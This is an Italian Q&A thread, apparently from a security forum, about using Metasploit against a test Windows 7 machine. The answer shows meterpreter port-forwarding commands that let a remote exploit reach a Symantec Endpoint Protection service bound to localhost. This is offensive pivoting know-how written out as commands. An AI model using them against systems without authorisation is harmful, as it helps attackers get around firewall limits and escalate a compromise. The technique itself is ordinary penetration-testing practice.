exploit remoto Metasploit localmente

1

Ho una macchina di prova in esecuzione:

  • Windows 7
  • Symantec Endpoint Protection.

Il firewall consente solo l'accesso a Symantec Endpoint Protection tramite 127.0.0.1.

Se ho acquisito una shell sulla macchina tramite windows / meterpreter / reverse_tcp.

E ho trovato un exploit da usare contro symantec, ma l'exploit è remoto e accetta solo RHOST e non SESSION.

C'è un modo per il mio di fornire una sessione invece di un IP remoto affinché l'exploit funzioni?

    
posta Ankh2054 02.08.2016 - 13:37
fonte

1 risposta

1

All'interno del tuo tester puoi inoltrare la porta dalla tua macchina locale:

meterpreter > portfwd add –l 3389 –p 3389 –r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
meterpreter > background

Quindi imposta RHOST su 127.0.0.1.

msf > set RHOST 127.0.0.1
msf > exploit

Docco qui .

    
risposta data 02.08.2016 - 14:57
fonte

Leggi altre domande sui tag